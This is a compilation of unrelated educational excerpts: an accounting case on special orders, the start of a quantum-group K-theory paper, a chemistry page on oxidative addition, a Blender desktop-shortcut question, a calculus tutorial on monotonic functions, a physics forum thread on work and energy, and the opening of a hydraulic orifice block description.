The analysis of Franco’s options did not consider any qualitative factors, such as the impact on morale if the company is already at capacity and opts to implement overtime or hire temporary workers to fill the special order. The analysis also does not consider the effect on regular customers if management elects to meet the special order by not fulfilling some of the regular orders. Another consideration is the impact on existing customers if the price offered for the special order is lower than the regular price. These effects may create a bad dynamic between the company and its customers, or they may cause customers to seek products from competitors. As in the example, Franco would need to consider the impact of displacing other customers and the risk of losing business from regular customers, such as dental supply companies, if he is unable to meet their orders. The next step is to do an overall cost/benefit analysis in which Franco would consider not only the quantitative but the qualitative factors before making his final decision on whether or not to accept the special order.
### Think It Through
#### Athletic Jersey Special Orders
Jake’s Jerseys has been asked to produce athletic jerseys for a local school district. The special order is for 1,000 jerseys of varying sizes, and the price offered by the school district is $10 less per jersey than the normal $50 market price. The school district interested in the jerseys is one of the largest in the area. What quantitative and qualitative factors should Jake consider in making the decision to accept or reject the special order?
|
|
# On the structure of quantum automorphism groups
Christian Voigt School of Mathematics and Statistics
University of Glasgow
15 University Gardens
Glasgow G12 8QW
United Kingdom
###### Abstract.
We compute the K-theory of quantum automorphism groups of finite dimensional C*-algebras in the sense of Wang. The results show in particular that the C*-algebras of functions on the quantum permutation groups S_N^+ are pairwise non-isomorphic for different values of N.
Along the way we discuss some general facts regarding torsion in discrete quantum groups. In fact, the duals of quantum automorphism groups are the most basic examples of discrete quantum groups exhibiting genuine quantum torsion phenomena.
###### 2000 Mathematics Subject Classification:
19D55, 81R50
This work was supported by the Engineering and Physical Sciences Research Council Grant EP/L013916/1.
## 1. Introduction
Quantum automorphism groups were introduced by Wang [Wangqsymmetry] in his study of noncommutative symmetries of finite dimensional C*-algebras. These quantum groups are quite different from q-deformations of compact Lie groups, and interestingly, they appear naturally in a variety of contexts, including combinatorics and free probability, see for instance [BBCsurvey], [BCSdefinetti]. The C*-algebraic properties of quantum automorphism groups were studied by Brannan [Brannanquantumautomorphism], revealing various similarities with free group C*-algebras.
An interesting subclass of quantum automorphism groups is provided by quantum permutation groups. Following [BSliberation], we will write S_N^+ for the quantum permutation group on N letters. According to the definition of Wang, the quantum group S_N^+ is the universal compact quantum group acting on the abelian C*-algebra of functions on N points. If one replaces this algebra by a general finite dimensional C*-algebra, one has to add the data of a state and restrict to state-preserving actions in the definition of quantum automorphism groups. Indeed, the choice of state is important in various respects. This is illustrated, for instance, by the work of De Rijdt and Vander Vennet on monoidal equivalences among quantum automorphism groups [dRV].
The aim of the present paper is to compute the K-theory of quantum automorphism groups. Our general strategy follows the ideas in [Voigtbcfo], which in turn build on methods from the Baum-Connes conjecture, formulated in the language of category theory following Meyer and Nest [MNtriangulated]. In fact, the main result of [Voigtbcfo] implies rather easily that the appropriately defined assembly map for duals of quantum automorphism groups is an isomorphism. The main additional ingredient, discussed further below, is the construction of suitable resolutions, entering the left hand side of the assembly map in the framework of [MNtriangulated].
The reason why this is more tricky than in [Voigtbcfo] is that quantum automorphism groups have torsion. At first sight, the presence of torsion may appear surprising because these quantum groups behave like free groups in many respects. Indeed, the way in which torsion enters the picture is different from what happens for classical discrete groups. Therefore quantum automorphism groups provide an interesting class of examples also from a conceptual point of view. Indeed, a better understanding of quantum torsion seems crucial in order to go beyond the class of quantum groups studied in the spirit of the Baum-Connes conjecture so far [MNcompact], [Voigtbcfo], [VVfreeu]. We have therefore included some basic considerations on torsion in discrete quantum groups in this paper.
From our computations discussed below one can actually see rather directly the effect of torsion on the level of K-theory. In particular, the K-groups of monoidally equivalent quantum automorphism groups can differ quite significantly due to minor differences in their torsion structure. Our results also have some direct operator algebraic consequences, most notably, they imply that the reduced C*-algebras of functions on quantum permutation groups can be distinguished by K-theory.
Let us now explain how the paper is organised. In section 2 we collect some definitions and facts from the theory of compact quantum groups and fix our notation. Section 3 contains more specific preliminaries on quantum automorphism groups and their actions. In section 4 we collect some basic definitions and facts regarding torsion in discrete quantum groups. In the quantum case, this is studied most efficiently in terms of ergodic actions of the dual compact quantum groups, and our setup generalises naturally previous considerations by Meyer and Nest [MNcompact], [Meyerhomalg2]. Finally, section 5 contains our main results.
Let us conclude with some remarks on notation. We write L(E) for the algebra of adjointable operators on a Hilbert module E. Moreover K(E) denotes the algebra of compact operators on E. The closed linear span of a subset X of a Banach space is denoted by [X]. Depending on the context, the symbol ⊗ denotes either the tensor product of Hilbert spaces, the spatial tensor product of C*-algebras, or the exterior tensor product of Hilbert modules.
## 2. Compact quantum groups
In this preliminary section we collect some definitions from the theory of compact quantum groups and fix our notation. We will mainly follow the conventions in [Voigtbcfo] as far as general quantum group theory is concerned.
###### Definition 2.1.
A compact quantum group G is given by a unital Hopf C*-algebra C(G), that is, a unital C*-algebra C(G) together with a unital *-homomorphism Δ: C(G) → C(G) ⊗ C(G), called comultiplication, such that
(Δ⊗id)Δ=(id⊗Δ)Δ
and
[(C(G)⊗1)Δ(C(G))]=C(G)⊗C(G)=[(1⊗C(G))Δ(C(G))].
For every compact quantum group G there exists a Haar state, namely a state φ on C(G) satisfying the invariance conditions (id ⊗ φ)Δ(f) = φ(f)1 = (φ ⊗ id)Δ(f) for all f ∈ C(G). The image of C(G) in the GNS-representation of φ is denoted C^r(G), and called the reduced C*-algebra of functions on G. We will write L2(G) for the GNS-Hilbert space of φ, and notice that the GNS-representation of C^r(G) on L2(G) is faithful.
A unitary representation of G on a Hilbert space H is a unitary element u ∈ M(C(G) ⊗ K(H)) such that (Δ ⊗ id)(u) = u₁₃u₂₃. In analogy with the classical theory for compact groups, every unitary representation of a compact quantum group is completely reducible, and irreducible representations are finite dimensional. We write Irr(G) for the set of equivalence classes of irreducible unitary representations of G. The linear span of matrix coefficients of all unitary representations of G forms a dense Hopf *-algebra inside C(G).
The full C*-algebra of functions C^f(G) on G is the universal C*-completion of the dense Hopf *-algebra of matrix coefficients. It admits a comultiplication as well, satisfying the density conditions in definition 2.1. The quantum group G can be equivalently described in terms of C^f(G) or the reduced C*-algebra C^r(G), or in fact, using the dense Hopf *-algebra. One says that G is coamenable if the canonical quotient map C^f(G) → C^r(G) is an isomorphism. In this case we will simply write C(G) again for this C*-algebra. By slight abuse of notation, we will also write C(G) if a statement holds for both C^f(G) and C^r(G).
The regular representation of G is the representation of G on the GNS-space L2(G) corresponding to the multiplicative unitary W ∈ L(L2(G) ⊗ L2(G)) determined by
W∗(Λ(f)⊗Λ(g))=(Λ⊗Λ)(Δ(g)(f⊗1)),
where Λ(f) ∈ L2(G) is the image of f ∈ C(G) under the GNS-map. The comultiplication of C(G) can be recovered from W by the formula
Δ(f)=W∗(1⊗f)W.
One defines the algebra of functions C0(^G) on the dual discrete quantum group ^G by
C0(^G)=[(L(L2(G))_*⊗id)(W)],
together with the comultiplication
^Δ(x)=^W∗(1⊗x)^W
for x ∈ C0(^G), where ^W = ΣW*Σ and Σ denotes the flip operator. We remark that there is no need to distinguish between full and reduced C*-algebras in the discrete case.
Since we are following the conventions of Kustermans and Vaes [KVLCQG], there is a flip map built into the above definition of C0(^G), so that the comultiplication of C0(^G) corresponds to the opposite multiplication of C(G). This is a natural choice in various contexts, but it is slightly inconvenient when it comes to Takesaki-Takai duality. We will write C0(ˇG) for the Hopf C*-algebra C0(^G) equipped with the opposite comultiplication ˇΔ = σ ∘ ^Δ, where σ denotes the flip map. By slight abuse of terminology, we shall refer to both ^G and ˇG as the dual quantum group of G, but in the sequel we will always work with ˇG instead of ^G. According to Pontrjagin duality, the double dual of G in either of the two conventions is canonically isomorphic to G.
An action of a compact quantum group G on a C*-algebra A is a coaction of C(G) on A, that is, an injective nondegenerate *-homomorphism α: A → C(G) ⊗ A such that (Δ ⊗ id)α = (id ⊗ α)α and [(C(G) ⊗ 1)α(A)] = C(G) ⊗ A. In a similar way one defines actions of discrete quantum groups, or in fact arbitrary locally compact quantum groups. We will call a C*-algebra equipped with a coaction of G a G-C*-algebra. Moreover we write G-Alg for the category of all G-C*-algebras and equivariant *-homomorphisms.
The reduced crossed product G ⋉r A of a G-C*-algebra A is the C*-algebra
G⋉rA=[(C0(ˇG)⊗1)α(A)]
The crossed product is equipped with a canonical dual action of the dual discrete quantum group, which turns it into a ˇG-C*-algebra. Moreover, one has the following analogue of the Takesaki-Takai duality theorem [BSUM].
###### Theorem 2.2.
Let G be a regular locally compact quantum group and let A be a G-C*-algebra. Then there is a natural isomorphism
ˇG⋉rG⋉rA≅K(L2(G))⊗A
of G-C*-algebras.
We will use Takesaki-Takai duality only for discrete and compact quantum groups, and in this setting regularity is automatic. At some points we will also use the full crossed product of a G-C*-algebra A, and we refer to [NVpoincare] for a review of its definition in terms of its universal property for covariant representations.
## 3. Quantum automorphism groups
In this section we review some basic definitions and results on quantum automorphism groups of finite dimensional -algebras and fix our notation. We refer to [Wangqsymmetry], [Banicageneric], [Banicafusscatalan] for more background on quantum automorphism groups.
Let us start with the definition of the quantum automorphism group of a finite dimensional C*-algebra A, compare [Wangqsymmetry], [Banicageneric]. If m: A ⊗ A → A denotes the multiplication map then a faithful state ω on A is called a δ-form for δ > 0 if mm* = δ² id with respect to the Hilbert space structures on A and A ⊗ A implemented by the GNS-constructions for ω and ω ⊗ ω, respectively.
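As a concrete sanity check (our own computation, not taken from the text): for the uniform trace on the abelian C*-algebra of functions on N points, the δ-form condition mm* = δ² id can be verified by hand, giving δ² = N.

```latex
% delta-form check for the uniform trace omega(a) = (1/N) sum_i a_i on C^N,
% with minimal projections e_i satisfying e_i e_j = delta_{ij} e_i.
\begin{align*}
\langle e_i, e_j \rangle_{\omega} &= \omega(e_i^* e_j) = \tfrac{\delta_{ij}}{N},
\qquad
\langle e_i \otimes e_j, e_k \otimes e_l \rangle_{\omega \otimes \omega}
  = \tfrac{\delta_{ik}\delta_{jl}}{N^2}, \\
\langle m^*(e_k), e_i \otimes e_j \rangle_{\omega \otimes \omega}
  &= \langle e_k, m(e_i \otimes e_j) \rangle_{\omega}
   = \delta_{ij}\,\tfrac{\delta_{ik}}{N}, \\
\text{hence}\quad m^*(e_k) &= N\, e_k \otimes e_k,
\qquad m m^*(e_k) = N e_k,
\end{align*}
% so m m^* = N \cdot \mathrm{id}, i.e. the uniform trace is a sqrt(N)-form.
```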
###### Definition 3.1.
Let A be a finite dimensional C*-algebra and let ω be a δ-form on A for some δ > 0. The quantum automorphism group of (A, ω) is the universal compact quantum group acting on A such that ω is preserved.
That is, if G is any compact quantum group together with a coaction of G on A preserving ω, then there exists a unique morphism of quantum groups such that the corresponding diagram commutes.
|
|
The polar oxidative addition mechanism is very similar to an aliphatic nucleophilic substitution (SN1 or SN2) reaction.
Figure $$\PageIndex{1}$$: An example of a polar oxidative addition.
In an oxidative addition, the metal can act as a nucleophile in the first step in an SN2 process. In the second step, the liberated halide binds to the metal. That doesn't happen in a normal nucleophilic substitution. In this case, the metal has donated its electrons and is able to accept another pair from the halide.
Figure $$\PageIndex{2}$$: Mechanistic steps in a polar oxidative addition.
Polar oxidative addition has some requirements similar to a regular SN1 or SN2 reaction:
• Requires good leaving group
• Requires tetrahedral carbon (or a proton) as electrophile
Exercise $$\PageIndex{1}$$
a) What do you think is the most difficult step (i.e. the rate-determining step) for the reaction in Figure $$\PageIndex{2}$$ (OA3.2)? Why?
b) Suggest the probable rate law for this reaction.
Probably the first step is the hardest (slowest) step, involving bond breaking in the alkyl halide. The donation of the resulting anion to the cation should be pretty fast.
$Rate = k_{1}[ML_{n}][CH_{3}Br] \nonumber$
Exercise $$\PageIndex{2}$$
The platinum compound shown below is capable of reductively eliminating a molecule of iodobenzene.
a) Show the products of this reaction.
The starting platinum compound is completely stable in benzene; no reaction occurs in that solvent. However, reductive elimination occurs quickly when the compound is dissolved in methanol instead.
b) Explain why the solvents may play a role in how easily this compound reacts.
The reaction in methanol is inhibited by added iodide salts, such as sodium iodide.
c) Provide a mechanism for the reductive elimination of iodobenzene from the platinum complex, taking into account the solvent dependence and the inhibition by iodide ion.
Methanol is more polar than benzene. The acceleration of the reaction in methanol suggests that there is increasing polarity in the transition state, or polar intermediates.
Inhibition by iodide ion suggests that iodide is a product of a reversible step during this reaction. Adding iodide pushes that step backward, decreasing the rate of product formation. The mechanism below is consistent with these observations:
Thus reductive elimination occurs as we go from the second to the third intermediate.
Presumably, the increased positive charge (and general decrease in electron density, owing to loss of a ligand) results in reductive elimination because of destabilization of the Pt(IV).
Alternatively, we might suppose that after loss of iodide, the iodide ion donates directly to a phenyl ligand, displacing the platinum as a leaving group in an SN2 reaction. That would lead directly to the product from the first intermediate, which is a simpler route. However, the precedent for aliphatic nucleophilic substitution involves nucleophilic donation to tetrahedral carbons, not to trigonal planar ones. That mechanism is unlikely.
Exercise $$\PageIndex{3}$$
For the following reaction,
a) Identify the oxidation state at platinum in the reactant and the products.
b) Assign stereochemical configuration in the product and the reactant.
c) Explain the stereochemistry of the reaction.
Pt(0) to Pt(II)
Changes from (R) to (S)
This is an SN2 reaction, so the platinum displaces the bromide from the opposite side.
Exercise $$\PageIndex{4}$$
Reaction of the following deuterium-labeled alkyl chloride with tetrakis(triphenylphosphine) palladium produces an enantiomerically pure product (equation a). Draw the expected product.
However, reaction of a very similar alkyl halide produces a compound that is only 90% enantiomerically pure. Draw the major product and explain the reason that there is some racemization
Exercise $$\PageIndex{5}$$
Frequently, oxidative additions and reductive eliminations are preceded or followed by other reactions. Draw a mechanism for the following transformation.
This page titled 5.3: Polar Oxidative Addition is shared under a CC BY-NC 3.0 license and was authored, remixed, and/or curated by Chris Schaller via source content that was edited to the style and standards of the LibreTexts platform; a detailed edit history is available upon request.
|
|
# Q: Blender 2.8 desktop shortcut doesn't work
After downloading 2.8 on Linux Mint, the blender.desktop shortcut doesn't open the application; it simply displays "There was an error launching the application". Running the executable directly works without any flaws.
• Is the path in the .desktop correct? – Robert Gützkow Aug 18 '19 at 8:06
• Yes, the executable is in the same folder and the name is correct. – devvoid Aug 19 '19 at 1:16
• Be sure the .desktop file refers to /dir/to/blender and not /dir/to/Blender – Tim Kuipers Aug 20 '19 at 9:31
• the file uses exec=blender, blender is in the exact same directory. – devvoid Aug 21 '19 at 0:20
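For reference, a minimal desktop entry for a manually extracted Blender generally needs an absolute path in `Exec` (a bare `blender` only resolves if that directory is on `$PATH`), and the keys are case-sensitive: `Exec=`, not `exec=`. The paths below are placeholders for wherever the archive was extracted; this is a sketch, not the file shipped in the tarball.

```ini
[Desktop Entry]
Name=Blender
# Absolute path to the extracted binary; adjust to your install location.
Exec=/home/user/blender-2.80/blender %f
Icon=/home/user/blender-2.80/blender.svg
Terminal=false
Type=Application
Categories=Graphics;3DGraphics;
```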
|
|
# Monotonic Functions (Increasing and Decreasing)
Monotonic simply means either increasing or decreasing; a function is monotonic on an interval if one of the two holds throughout that interval. In this article, I discuss at length how to find extrema of monotonic functions. An essential tool in this regard is the First Derivative Test. Finding extrema becomes much easier once you have mastered this theorem.
All relative extrema of a function’s graph must occur at critical numbers of the function (where the derivative is undefined or zero). We discuss the first derivative test and illustrate its use with several examples. Exercises are given at the end.
## Increasing and Decreasing Functions
To determine where a function $f$ is increasing or decreasing, we begin by finding the critical numbers. These numbers divide the $x$-axis into intervals, and we test the sign of $f'(x)$ in each of these intervals. This procedure is often called the first derivative test and can be used to determine local extrema and intervals of monotonicity.
Definition. A function $f$ is called increasing on an interval $I$ if $f\left(x_1\right) < f\left(x_2\right)$ whenever $x_1<x_2$ on $I.$ A function $f$ is called decreasing on an interval $I$ if $f\left(x_1\right) > f\left(x_2\right)$ whenever $x_1<x_2$ on $I.$
Definition. A function $f$ is called monotonic on an interval $I$ if it is either increasing or decreasing on $I.$
Theorem. Suppose $f$ is continuous on $[a,b]$ and differentiable on $(a,b).$
(1) If $f'(x)>0$ for all $x$ in $(a,b),$ then $f$ is increasing on $(a,b).$
(2) If $f'(x)<0$ for all $x$ in $(a,b),$ then $f$ is decreasing on $(a,b).$
Example. Find where the function $$f(x)=3x^4-4x^3-12x^2+5$$ is increasing and decreasing; that is determine the intervals where $f$ is monotonic.
Solution. The derivative of $f$ is $$f'(x)=12x^3-12x^2-24x=12x(x-2)(x+1).$$ Since $f$ is continuous and differentiable, to test where the function is monotonic we divide the $x$-axis at the critical numbers $x=-1,$ $x=0,$ and $x=2$ according to the sign of $f'(x),$ which depends on the signs of $12x,$ $x-2,$ and $x+1.$ We put our results into the following table: $$\begin{array}{c|c|c|c|c|l} \text{Interval} & 12x & x-2 & x+1 & f'(x)\text{ } & f \\ \hline x<-1 & – & – & – & – & \text{decreasing on } (-\infty ,-1) \\ -1<x<0 & – & – & + & + & \text{increasing on } (-1,0) \\ 0<x<2 & + & – & + & – & \text{decreasing on } (0,2) \\ x>2 & + & + & + & + & \text{increasing on } (2,\infty ) \end{array}$$ as needed.
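A quick numeric check of this sign analysis (our own sketch in plain Python): evaluate $f'(x)=12x(x-2)(x+1)$ at one test point inside each interval.

```python
# Sign check for f'(x) = 12x^3 - 12x^2 - 24x = 12x(x - 2)(x + 1).
def fprime(x):
    return 12 * x**3 - 12 * x**2 - 24 * x

# The critical numbers are exactly where f' vanishes.
for c in (-1, 0, 2):
    assert fprime(c) == 0

# One test point per interval reproduces the sign pattern:
# negative, positive, negative, positive.
print(fprime(-2) < 0, fprime(-0.5) > 0, fprime(1) < 0, fprime(3) > 0)
# → True True True True
```

So $f$ decreases, increases, decreases, and increases on the four intervals, matching the first derivative test.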
## The First Derivative Test
Theorem. (First Derivative Test) Suppose that $c$ is a critical number of a function that is continuous on $[a,b].$ Then the following statements hold:
(1) If $f'(x)>0$ on $(a,c)$ and $f'(x)<0$ on $(c,b),$ then $f$ has a relative (local) maximum at $c.$
(2) If $f'(x)<0$ on $(a,c)$ and $f'(x)>0$ on $(c,b),$ then $f$ has a relative (local) minimum at $c.$
(3) If neither holds, then $f$ has no relative (local) extremum at $c.$
Example. Apply the First Derivative Test to find the local extrema of the function $$f(x)=x(1-x)^{2/5}$$ and sketch its graph.
Solution. First we find the critical numbers of $f$ by solving $f'(x)=0$ and determining where $f'(x)$ is undefined but $f(x)$ is defined. The derivative of $f$ is \begin{align*} f'(x) & =(1-x)^{2/5}+\frac{2x}{5}(1-x)^{-3/5}(-1) \\ & =\frac{5(1-x)-2x}{5(1-x)^{3/5}} \\ & =\frac{5-7x}{5(1-x)^{3/5}}. \end{align*} Solving $f'(x)=0$ we find $x=5/7.$ Also $f'(1)$ does not exist but $f(1)=0;$ and therefore the only critical numbers of $f$ are $x=5/7$ and $x=1.$ We determine the local extrema using the following table \begin{align*} \begin{array}{c|c|c|c|l} \text{Interval} & 5-7x & (1-x)^{3/5} & f'(x) & f(x) \\ \hline x<\frac{5}{7} & + & + & + & \text{ increasing on } \left(-\infty ,\frac{5}{7}\right) \\ \frac{5}{7}<x<1 & – & + & – & \text{ decreasing on } \left(\frac{5}{7},1\right) \\ x>1 & – & – & + & \text{ increasing on }(1,+\infty ) \end{array} \end{align*} Therefore, $\left(\frac{5}{7},f\left(\frac{5}{7}\right)\right)$ is a local maximum and $(1,f(1))$ is a local minimum. Here is the graph of the function $f(x)=x(1-x)^{2/5}.$ Notice there is a cusp at $(1,f(1))$ because $f$ is defined there but $f'$ is not.
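The increasing/decreasing pattern can also be confirmed numerically (our own sketch). Writing $(1-x)^{2/5}$ as $\left((1-x)^2\right)^{1/5}$ keeps the computation real-valued for $x>1$:

```python
# f(x) = x * (1 - x)^(2/5), computed via the real fifth root of (1 - x)^2.
def f(x):
    return x * ((1 - x) ** 2) ** 0.2

peak = f(5 / 7)  # candidate local maximum at x = 5/7
# f rises into x = 5/7, falls toward the critical point at x = 1,
# and rises again afterward.
print(f(0.5) < peak, f(0.9) < peak, f(1.0) == 0.0, f(1.5) > f(1.0))
# → True True True True
```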
## Finding Extrema
Example. Find the local and absolute extrema values of the function $$f(x)=x^3(x-2)^2$$ on the interval $-1\leq x\leq 3.$ Sketch the graph.
Solution. First we notice that $f$ is a polynomial and so is continuous and differentiable for all real numbers. Next we find the critical numbers of $f$ by solving $f'(x)=0$ and determining where $f'(x)$ is undefined, but $f(x)$ is defined. The derivative of $f$ is \begin{align*} f'(x) & =3x^2(x-2)^2+2x^3(x-2) \\ & =x^2(x-2)(5x-6). \end{align*} To find the critical numbers we set $f'(x)=0$ and obtain $x=0,2,6/5.$ We determine the local extrema and absolute extrema using the following table: \begin{align*} \begin{array}{c|c|c|c|c|l} \text{Interval} & x^2 & x-2 & 5x-6 & f'(x)\text{ } & f \\ \hline -1<x<0 & + & – & – & + & \text{ increasing on} (-1,0) \\ 0<x<\frac{6}{5} & + & – & – & + & \text{ increasing on } \left(0, \frac{6}{5}\right) \\ \frac{6}{5}<x<2 & + & – & + & – & \text{ decreasing on }\left(\frac{6}{5},2\right) \\ 2<x<3 & + & + & + & + & \text{ increasing on } (2,3) \end{array} \end{align*} The function $f$ does not have a local extrema at $x=0.$ The local maximum is $\left(\frac{6}{5},f\left(\frac{6}{5}\right)\right)$ and the local minimum is $(2,f(2)).$ Since $f$ is a continuous function we can use the extreme value theorem to determine absolute extrema. We compute the functional values at the endpoints, namely $f(-1)=-9$ and $f(3)=27.$ Therefore, the absolute maximum is $f(3)=27$ and the absolute minimum is $f(-1)=-9$.
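Since the candidates for absolute extrema on a closed interval are just the critical numbers and the endpoints, the closed-interval bookkeeping is easy to script (our own sketch):

```python
# Closed-interval method for f(x) = x^3 (x - 2)^2 on [-1, 3].
def f(x):
    return x**3 * (x - 2) ** 2

candidates = [-1, 0, 6 / 5, 2, 3]          # endpoints + critical numbers
values = {x: f(x) for x in candidates}

print(max(values, key=values.get), max(values.values()))   # 3 27
print(min(values, key=values.get), min(values.values()))   # -1 -9
```

This reproduces the conclusion above: the absolute maximum is $f(3)=27$ and the absolute minimum is $f(-1)=-9$.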
## Exercises on Monotonic Functions
Exercise. For each of the following functions determine the critical points and apply the first derivative test to determine the intervals where the function is increasing or decreasing, and all local extrema.
$(1) \quad \displaystyle f(x)=(x-1)^2(x+2)$
$(2) \quad \displaystyle f(x)=(x-1)e^{-x}$
$(3) \quad \displaystyle f(x)=x^{-1/3}(x+2)$
$(4) \quad \displaystyle f(\theta )=3\theta ^2-4\theta ^3$
$(5) \quad \displaystyle h(r)=(r+7)^3$
$(6) \quad \displaystyle g(x)=x^2\sqrt{5-x}$
$(7) \quad \displaystyle f(x)=\frac{x^3}{3x^2+1}$
$(8) \quad \displaystyle h(x)=x^{1/3}\left(x^2-4\right)$
$(9) \quad \displaystyle f(x)=e^{2x}+e^{-x}$
$(10) \quad \displaystyle f(x)=x \ln x$
$(11) \quad \displaystyle f(x)=(x+1)^2$
$(12) \quad \displaystyle f(x)=-x^2-6x-9$
$(13) \quad \displaystyle k(x)=x^3+3x^2+3x+1$
Exercise. Sketch the graph of a differentiable function $y=f(x)$ through the point $(1,1)$ that satisfies the following conditions:
$(1) \quad f'(1)=0$
$(2) \quad f'(x)>0$ for $x<1$ and $f'(x)<0$ for $x>1$
$(3) \quad f'(x)>0$ for $x\neq 1$
$(4) \quad f'(x)<0$ for $x\neq 1$
Exercise. Sketch the graph of a differentiable function $y=f(x)$ that satisfies the following condition.
(1) a local minimum at $(1,1)$
(2) a local maximum at $(3,3)$
(3) local maximum at $(1,1)$
(4) a local minimum at $(3,3)$
Exercise. Sketch the graph of a differentiable function $y=h(x)$ that satisfies all of the following conditions. $h(0)=0,$ for all $x$, $-2\leq h(x)\leq 2,$ $h'(x)\to +\infty$ as $x\to 0^-,$ and $h'(x)\to +\infty$ as $x\to 0^+.$
David Smith (Dave) has a B.S. and M.S. in Mathematics and has enjoyed teaching precalculus, calculus, linear algebra, and number theory at both the junior college and university levels for over 20 years. David is the founder and CEO of Dave4Math.
|
|
# Force, work, and energy problems
1. Jul 20, 2004
### Physicshelpneeded
Force, work, and energy problems!!
k im kind of pissed off because i just started getting the hang of this physics stuff and understanding everything going on with momentum, acceleration and velocity changes, etc...
but now that we moved on to forces, energy, and work, its been nothing but headaches for me .
for example, 1 question asks me....
A force acts on a 2.0 kg cart while the cart moves 1.2 m. the work done by the force during the motion is 3.0 J. When the force begins to act on the cart, the cart is already moving with a speed of 1.0 m/s.
(a) What is the kinetic energy of the cart at the end of the 1.2 m motion? show calculations, etc...
what i did for this was say E<i> was KE<i> and E<f> was KE<f> so i said KE<i> = KE<f> which makes no sense because if there is an extra force they cant be equal... can anyone help?!
(b) What is the speed of the cart at the end of the motion? Show calculations, etc...
(I could not answer this question because i dont know how to do part A)
SOMEONE HELP ME!!!!
THANKS!
2. Jul 20, 2004
### JohnDubYa
Energy is not conserved because a non-conservative force (the push force) acts on it. So $$KE_i \neq KE_f$$
KNOW YOUR WORK-ENERGY THEOREMS. In non-calcululs langauge (that is, for constant forces):
$$W_{\rm NC} = F_{\rm NC} d \cos(\theta) = \Delta E$$,
which says that the work done by a nonconservative force changes the total mechanical energy of an object by $$\Delta E$$.
For conservative forces,
$$W_{\rm C} = F_{\rm C} d \cos(\theta) = -\Delta ({\rm PE})$$
which says that the work done by a conservative force changes the total potential energy of an object by $$-\Delta ({\rm PE})$$.
So use the first work-energy theorem to find $$\Delta E$$. Since common sense says that
$$\Delta PE + \Delta KE = \Delta E$$
and $$\Delta PE = 0$$, then you should be able to find the change in kinetic energy of the object.
Last edited: Jul 20, 2004
3. Jul 20, 2004
### Physicshelpneeded
it looks like all the information u posted is factoral and important....but unfortunately im only in physics 1, lol...and we're not even getting close to what equations n stuff u just told me....u r telling me about change in energy and the question doesnt ask that, asks for energy at end motion or whatever....
the equations the professor gave in class were...
Work = force x displacement
K<i> + P<i> = K<f> + P<f>
KE = 1/2 mv^2
and finally PE = -mgh
with these equations or something close to it, can someone help me out?
THANKS
4. Jul 21, 2004
### JohnDubYa
If you know the initial energy, then if you know the change in energy you will know the final energy. For any property (which we will call $$P$$),
$$P_i + \Delta P = P_f$$
NO, only if there is no work being done by non-conservative forces. And in the example you provided, there is work being done by a non-conservative force.
Equations must be considered within their context. You simply cannot use the conservation-of-energy equation in the problem you provided because total mechanical energy is not conserved.
So the initial energy is not the same as the final energy. In fact, the final energy is greater than the initial energy. By how much? According to the work-energy theorem I wrote, by the amount of work done by the non-conservative force.
So find this work by multiplying the force times the displacement. Add your result to the initial energy and you will obtain the final energy.
(BTW, your instructor is assuming that the force and displacement act along the same line, thus eliminating the cosine term in the definition of work.)
5. Jul 21, 2004
### ArmoSkater87
First list out what u know, it always helps me when I do.
$$m=2kg$$
$$d=1.2m$$
$$W=3J$$
$$V_0=1m/s$$
Now figure out how fast the cart accelerates
$$F=ma, W=Fd=mad$$
$$3J=(2kg)(a)(1.2m)$$
$$a=1.25m/s^2$$
Now use a constant acceleration equation to find the speed at the end.
$$V^2 = V_0^2 + 2ad$$
$$V^2 = (1m/s)^2 + (2)(1.25m/s^2)(1.2m)$$
$$V = 2m/s$$
Now figure out its KE at that speed.
$$KE = (1/2)mv^2 = (1/2)(2kg)(2m/s)^2$$
$$KE = 4J$$
Last edited: Jul 21, 2004
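The acceleration route in the post above can be reproduced line by line (an illustrative Python sketch of the same arithmetic):

```python
# ArmoSkater87's route: W = F*d = m*a*d, then v^2 = v0^2 + 2*a*d,
# then KE = (1/2) m v^2. Same assumed numbers as in the thread.
m, d, W, v0 = 2.0, 1.2, 3.0, 1.0   # kg, m, J, m/s

a = W / (m * d)                 # acceleration, 1.25 m/s^2
v = (v0**2 + 2 * a * d) ** 0.5  # final speed, 2 m/s
ke = 0.5 * m * v**2             # kinetic energy, 4 J
```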
6. Jul 21, 2004
### JohnDubYa
Armo, the problem appears to have been set up for a work-energy solution. And besides, the work-energy solution is much, much easier than using acceleration.
7. Jul 21, 2004
### ArmoSkater87
Well, i dont know, as long as i got the answer right
8. Jul 21, 2004
### JohnDubYa
AFAICT, your solution is fine. But I think the teacher wants the student to be able to use the work-energy theorems. So using acceleration would defeat the purpose.
9. Jul 25, 2004
### pnaj
Hey 'Physicshelpneeded', I've only just seen your thread, so this might be too late for your assignment, but anyway ...
Did your teacher talk about the Work-Energy Theorem? It says: The total work done is equal to the change in kinetic energy. So, $Work = KE_{final} - KE_{initial}$.
If you haven't come across this yet, you have to go the hard way, which is what 'ArmoSkater87' did. The fact that the question gave you a distance almost tells you that this is probably the case, because you wouldn't actually need this information for the W-E Theorem.
Just supposing he did mention the Work-Energy Theorem, it's much simpler. The only other equation you need is the definition of kinetic energy: $KE = (1/2)mv^{2}$.
Part (a) asks for the final kinetic energy. Now, we are given the work, the mass and the initial speed, so writing out the W-E thm in terms of known variables (and using the defn of KE), we get $Work = KE_{final} - (1/2)mv_{initial}^{2}$. A little re-arranging and plugging-in of values will give you the answer.
Part (b) then asks you for the final speed. Since you now know, from part (a), the value of the final KE, you can use the defn of KE again to get the final speed, since $KE_{final} = (1/2)mv_{final}^{2}$.
Notice that we didn't need to know anything about the nature of the force acting on the cart at all. Was it conservative or not? Doesn't matter! Was it gravity, or friction, or some combination of forces? Doesn't matter!
All we were given was the work done, the mass and an initial speed. This is the beauty of the Work-Energy Theorem.
Hope that helps!
10. Jul 26, 2004
### KnowledgeIsPower
Work = Force x Distance.
3 = Force x 1.2
3/1.2 = Force.
Force = 2.5N
As we have no detail of any coefficient of friction or incline, we assume no energy is lost along the way.
Thus, KE at start = 0.5 × 2 × 1² = 1J
KE at end = 1J + 3J = 4J. (1J originally and an extra 3J inputted. Energy has not been spent on work against friction or an incline).
KE at end = 4J
KE = 0.5mv^2
4 = .5x2xV^2
4=v^2
V=2m/s
|
|
# Fixed Orifice
Hydraulic orifice with constant cross-sectional area
Orifices
## Description
The Fixed Orifice block models a sharp-edged, constant-area orifice whose flow rate depends on the pressure differential across the orifice. The flow rate is determined according to the following equations:
`$q={C}_{D}\cdot A\sqrt{\frac{2}{\rho }}\cdot \frac{\Delta p}{{\left({\left(\Delta p\right)}^{2}+{p}_{cr}^{2}\right)}^{1/4}}$`
